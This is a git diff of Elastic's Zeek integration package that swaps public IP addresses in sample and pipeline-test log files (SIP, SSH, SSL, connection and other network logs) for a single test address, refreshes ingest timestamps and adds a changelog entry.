-{"ts":1617119416.928735,"uid":"CR6XQH1Lf2mF9YG7H2","id.orig_h":"193.107.216.13","id.orig_p":5083,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@35.198.74.222","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"767538559354206383610151","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 193.107.216.13:5083"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} -{"ts":1617119923.416653,"uid":"Cf9QMt4ear7ZkX74ti","id.orig_h":"45.134.144.100","id.orig_p":5170,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@35.198.74.222","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"35848812076538877174452","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 127.0.0.1:5170"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} \ No newline at end of file +{"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0} +{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"89.160.20.156","id.orig_p":5061,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@89.160.20.156","seq":"1 INVITE","request_path":["SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061"],"response_path":["SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061","SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0} +{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"89.160.20.156","id.orig_p":5061,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 89.160.20.156:5061;rport"],"response_path":["SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0} +{"ts":1617119416.928735,"uid":"CR6XQH1Lf2mF9YG7H2","id.orig_h":"89.160.20.156","id.orig_p":5083,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@89.160.20.156","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"767538559354206383610151","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 89.160.20.156:5083"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} +{"ts":1617119923.416653,"uid":"Cf9QMt4ear7ZkX74ti","id.orig_h":"89.160.20.156","id.orig_p":5170,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@89.160.20.156","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"35848812076538877174452","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 127.0.0.1:5170"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} \ No newline at end of file diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/snmp.log b/packages/zeek/_dev/deploy/docker/sample_logs/snmp.log index 84ac5f8f69b..4d278a60ad1 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/snmp.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/snmp.log @@ -1,2 +1,2 @@ {"ts":1543877948.916584,"uid":"CnKW1B4w9fpRa6Nkf2","id.orig_h":"192.168.1.2","id.orig_p":59696,"id.resp_h":"192.168.1.1","id.resp_p":161,"duration":7.849924,"version":"2c","community":"public","get_requests":0,"get_bulk_requests":0,"get_responses":8,"set_requests":0,"up_since":1543631204.766508} -{"ts":1617080496.400704,"uid":"CxtWIB4ECPW89F8mSi","id.orig_h":"184.105.139.67","id.orig_p":37533,"id.resp_h":"10.156.0.2","id.resp_p":161,"duration":0.0,"version":"2c","community":"public","get_requests":4,"get_bulk_requests":0,"get_responses":0,"set_requests":0} \ No newline at end of file +{"ts":1617080496.400704,"uid":"CxtWIB4ECPW89F8mSi","id.orig_h":"89.160.20.156","id.orig_p":37533,"id.resp_h":"10.156.0.2","id.resp_p":161,"duration":0.0,"version":"2c","community":"public","get_requests":4,"get_bulk_requests":0,"get_responses":0,"set_requests":0} \ No newline at end of file diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/ssh.log b/packages/zeek/_dev/deploy/docker/sample_logs/ssh.log index c4517fbceaa..85ccd975ac4 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/ssh.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/ssh.log @@ -1,4 +1,4 @@ {"ts":1562527532.904291,"uid":"CajWfz1b3qnnWT0BU9","id.orig_h":"192.168.1.2","id.orig_p":48380,"id.resp_h":"192.168.1.1","id.resp_p":22,"version":2,"auth_success":false,"auth_attempts":2,"client":"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10","server":"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1","cipher_alg":"chacha20-poly1305@openssh.com","mac_alg":"umac-64-etm@openssh.com","compression_alg":"none","kex_alg":"curve25519-sha256@libssh.org","host_key_alg":"ecdsa-sha2-nistp256","host_key":"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd"} -{"ts":1617123417.413634,"uid":"COXxsJ3dlSh6ECRYQj","id.orig_h":"51.161.10.160","id.orig_p":38204,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} -{"ts":1617123445.61524,"uid":"CZPdXz1jfKSWzIDAeb","id.orig_h":"113.53.238.195","id.orig_p":44164,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} -{"ts":1617123450.957272,"uid":"Cha1rs3OamonAZ4Nz6","id.orig_h":"34.86.35.26","id.orig_p":33953,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-ZGrab ZGrab SSH Survey"} \ No newline at end of file +{"ts":1617123417.413634,"uid":"COXxsJ3dlSh6ECRYQj","id.orig_h":"89.160.20.156","id.orig_p":38204,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} +{"ts":1617123445.61524,"uid":"CZPdXz1jfKSWzIDAeb","id.orig_h":"89.160.20.156","id.orig_p":44164,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} +{"ts":1617123450.957272,"uid":"Cha1rs3OamonAZ4Nz6","id.orig_h":"89.160.20.156","id.orig_p":33953,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-ZGrab ZGrab SSH Survey"} \ No newline at end of file diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/ssl.log b/packages/zeek/_dev/deploy/docker/sample_logs/ssl.log index 5a94c139767..a8a0385eb0a 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/ssl.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/ssl.log @@ -1,9 +1,9 @@ -{"ts":1547688736.805088,"uid":"CAOvs1BMFCX2Eh0Y3","id.orig_h":"10.178.98.102","id.orig_p":63199,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FebkbHWVCV8rEEEne","F4BDY41MGUBT6URZMd","FWlfEfiHVkv8evDL3"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} -{"ts":1547688736.80509,"uid":"C3mki91FnnNtm0u1ok","id.orig_h":"10.178.98.102","id.orig_p":63198,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["Fue9H32OmuitQk2zR","FpbiBP215tk2xftxM6","FEdROj1vUzTGw3BIUa"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} -{"ts":1547688736.805527,"uid":"CfGBt82PzCXzHa0iek","id.orig_h":"10.178.98.102","id.orig_p":63197,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FiFLYv3UjeWyv2gcW","FvSsiB1Xi816EMagI9","FWpPS4mjGaAhTRXLf"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}{"ts":1602179457.352156,"uid":"CK17Dl2SB8bZOVonSl","id.orig_h":"10.0.0.1","id.orig_p":49228,"id.resp_h":"192.168.50.1","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA256","resumed":false,"established":true,"cert_chain_fuids":["FOLwYQ6rs70bIMSf9"],"client_cert_chain_fuids":[],"subject":"CN=foo,OU=foo@bar,O=org,L=locality,C=LO","issuer":"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI","validation_status":"self signed certificate","ja3":"74927e242d6c3febf8cb9cab10a7f889","ja3s":"80b3a14bccc8598a1f3bbe83e71f735f","resp_certificate_sha1":"5dad8b55621b6b9c30679d9d61248dd132a83c94","not_valid_before":1562022421,"not_valid_after":1577748224} -{"ts":1617091251.151303,"uid":"CLQiVH1VcpvT3ruEak","id.orig_h":"10.156.0.2","id.orig_p":52730,"id.resp_h":"46.101.87.151","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","resumed":false,"established":false} -{"ts":1617090955.826099,"uid":"CBiXOC4IqYxMv1xzf9","id.orig_h":"35.195.125.46","id.orig_p":52678,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091253.726384,"uid":"C4jH9IqWGZwc1PPUh","id.orig_h":"35.198.74.222","id.orig_p":53368,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"tickets.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091253.91861,"uid":"CXVMSq6Dainy4WFN9","id.orig_h":"35.198.74.222","id.orig_p":53382,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"rundeck.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091254.325291,"uid":"CsgtQe4AikDZBsIM6k","id.orig_h":"10.156.0.2","id.orig_p":55120,"id.resp_h":"104.154.89.105","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["FeyRIk4nUtwwcUcnRf"],"client_cert_chain_fuids":[],"validation_status":"self signed certificate"} -{"ts":1617091255.065602,"uid":"CPGhJS3UPpcnR96NQc","id.orig_h":"35.195.125.46","id.orig_p":53095,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} \ No newline at end of file +{"ts":1547688736.805088,"uid":"CAOvs1BMFCX2Eh0Y3","id.orig_h":"10.178.98.102","id.orig_p":63199,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FebkbHWVCV8rEEEne","F4BDY41MGUBT6URZMd","FWlfEfiHVkv8evDL3"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} +{"ts":1547688736.80509,"uid":"C3mki91FnnNtm0u1ok","id.orig_h":"10.178.98.102","id.orig_p":63198,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["Fue9H32OmuitQk2zR","FpbiBP215tk2xftxM6","FEdROj1vUzTGw3BIUa"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} +{"ts":1547688736.805527,"uid":"CfGBt82PzCXzHa0iek","id.orig_h":"10.178.98.102","id.orig_p":63197,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FiFLYv3UjeWyv2gcW","FvSsiB1Xi816EMagI9","FWpPS4mjGaAhTRXLf"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}{"ts":1602179457.352156,"uid":"CK17Dl2SB8bZOVonSl","id.orig_h":"10.0.0.1","id.orig_p":49228,"id.resp_h":"192.168.50.1","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA256","resumed":false,"established":true,"cert_chain_fuids":["FOLwYQ6rs70bIMSf9"],"client_cert_chain_fuids":[],"subject":"CN=foo,OU=foo@bar,O=org,L=locality,C=LO","issuer":"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI","validation_status":"self signed certificate","ja3":"74927e242d6c3febf8cb9cab10a7f889","ja3s":"80b3a14bccc8598a1f3bbe83e71f735f","resp_certificate_sha1":"5dad8b55621b6b9c30679d9d61248dd132a83c94","not_valid_before":1562022421,"not_valid_after":1577748224} +{"ts":1617091251.151303,"uid":"CLQiVH1VcpvT3ruEak","id.orig_h":"10.156.0.2","id.orig_p":52730,"id.resp_h":"89.160.20.156","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","resumed":false,"established":false} +{"ts":1617090955.826099,"uid":"CBiXOC4IqYxMv1xzf9","id.orig_h":"89.160.20.156","id.orig_p":52678,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} +{"ts":1617091253.726384,"uid":"C4jH9IqWGZwc1PPUh","id.orig_h":"89.160.20.156","id.orig_p":53368,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"tickets.swiftcrypto.com","resumed":false,"established":false} +{"ts":1617091253.91861,"uid":"CXVMSq6Dainy4WFN9","id.orig_h":"89.160.20.156","id.orig_p":53382,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"rundeck.swiftcrypto.com","resumed":false,"established":false} +{"ts":1617091254.325291,"uid":"CsgtQe4AikDZBsIM6k","id.orig_h":"10.156.0.2","id.orig_p":55120,"id.resp_h":"89.160.20.156","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["FeyRIk4nUtwwcUcnRf"],"client_cert_chain_fuids":[],"validation_status":"self signed certificate"} +{"ts":1617091255.065602,"uid":"CPGhJS3UPpcnR96NQc","id.orig_h":"89.160.20.156","id.orig_p":53095,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} \ No newline at end of file diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/traceroute.log b/packages/zeek/_dev/deploy/docker/sample_logs/traceroute.log index b3595d55a6b..61a9323a0e2 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/traceroute.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/traceroute.log @@ -1 +1 @@ -{"ts":1361916158.650605,"src":"192.168.1.1","dst":"8.8.8.8","proto":"udp"} +{"ts":1361916158.650605,"src":"192.168.1.1","dst":"89.160.20.156","proto":"udp"} diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/tunnel.log b/packages/zeek/_dev/deploy/docker/sample_logs/tunnel.log index 139a6591c75..f535a3eaa6e 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/tunnel.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/tunnel.log @@ -1 +1 @@ -{"ts":1544405666.743509,"id.orig_h":"132.16.146.79","id.orig_p":0,"id.resp_h":"132.16.110.133","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"} +{"ts":1544405666.743509,"id.orig_h":"89.160.20.156","id.orig_p":0,"id.resp_h":"89.160.20.156","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"} diff --git a/packages/zeek/changelog.yml b/packages/zeek/changelog.yml index a1b28b52246..e7d52685ec9 100644 --- a/packages/zeek/changelog.yml +++ b/packages/zeek/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.5.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json b/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json index f698f3305d7..03e30262e58 100644 --- a/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json +++ b/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json @@ -15,7 +15,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911369200Z", + "ingested": "2021-12-09T13:50:56.071408600Z", "original": "{\"ts\":1568132368.465338,\"ts_delta\":32.282249,\"peer\":\"bro\",\"gaps\":0,\"acks\":206,\"percent_lost\":0.0}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -40,7 +40,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911387100Z", + "ingested": "2021-12-09T13:50:56.071411900Z", "original": "{\"ts\":1617062640.941952,\"ts_delta\":900.0005369186401,\"peer\":\"zeek\",\"gaps\":58475,\"acks\":65665,\"percent_lost\":89.05048351481003}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -65,7 +65,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911395500Z", + "ingested": "2021-12-09T13:50:56.071417300Z", "original": "{\"ts\":1617063540.942231,\"ts_delta\":900.0002789497376,\"peer\":\"zeek\",\"gaps\":54754,\"acks\":61818,\"percent_lost\":88.5729075673752}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -90,7 +90,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911403100Z", + "ingested": "2021-12-09T13:50:56.071422800Z", "original": "{\"ts\":1617064440.942597,\"ts_delta\":900.0003659725189,\"peer\":\"zeek\",\"gaps\":51022,\"acks\":57974,\"percent_lost\":88.00841756649533}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -115,7 +115,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911410700Z", + "ingested": "2021-12-09T13:50:56.071427300Z", "original": "{\"ts\":1617065340.942651,\"ts_delta\":900.0000541210175,\"peer\":\"zeek\",\"gaps\":55105,\"acks\":62497,\"percent_lost\":88.17223226714883}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -148,7 +148,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911418400Z", + "ingested": "2021-12-09T13:50:56.071431100Z", "original": "{\"ts\":1568132368.465338,\"ts_delta\":32.282249,\"peer\":\"bro\",\"gaps\":0,\"acks\":206,\"percent_lost\":0.0}", "type": "info", "created": "2020-04-28T11:07:58.223Z", diff --git a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log index b652a425954..73bf06d9817 100644 --- a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log +++ b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log @@ -1,11 +1,11 @@ {"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} -{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} -{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"4.4.2.2","id.orig_p":38334,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} -{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.0.2.205","id.orig_p":3,"id.resp_h":"198.51.100.249","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]} -{"ts":1617062400.404645,"uid":"CCicIg43lOtCQOxXnb","id.orig_h":"10.156.0.2","id.orig_p":56190,"id.resp_h":"46.101.87.151","id.resp_p":443,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} -{"ts":1617062100.419397,"uid":"C52mXBCPJ4pPGkhr1","id.orig_h":"10.156.0.2","id.orig_p":60810,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10370898246765137,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} -{"ts":1617062100.419603,"uid":"CTzCky2CyLT5JJvHck","id.orig_h":"10.156.0.2","id.orig_p":60804,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10412883758544922,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} -{"ts":1617062100.419826,"uid":"CIkS28PDxqQnN49m2","id.orig_h":"10.156.0.2","id.orig_p":60802,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10433387756347656,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} +{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"89.160.20.156","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} +{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"89.160.20.156","id.orig_p":38334,"id.resp_h":"89.160.20.156","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} +{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.168.2.205","id.orig_p":3,"id.resp_h":"89.160.20.156","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]} +{"ts":1617062400.404645,"uid":"CCicIg43lOtCQOxXnb","id.orig_h":"10.156.0.2","id.orig_p":56190,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} +{"ts":1617062100.419397,"uid":"C52mXBCPJ4pPGkhr1","id.orig_h":"10.156.0.2","id.orig_p":60810,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10370898246765137,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} +{"ts":1617062100.419603,"uid":"CTzCky2CyLT5JJvHck","id.orig_h":"10.156.0.2","id.orig_p":60804,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10412883758544922,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} +{"ts":1617062100.419826,"uid":"CIkS28PDxqQnN49m2","id.orig_h":"10.156.0.2","id.orig_p":60802,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10433387756347656,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} {"ts":1617062390.563187,"uid":"CezEGe4jeLNkayV976","id.orig_h":"10.156.0.2","id.orig_p":38948,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.02680206298828125,"orig_bytes":0,"resp_bytes":241,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":269} 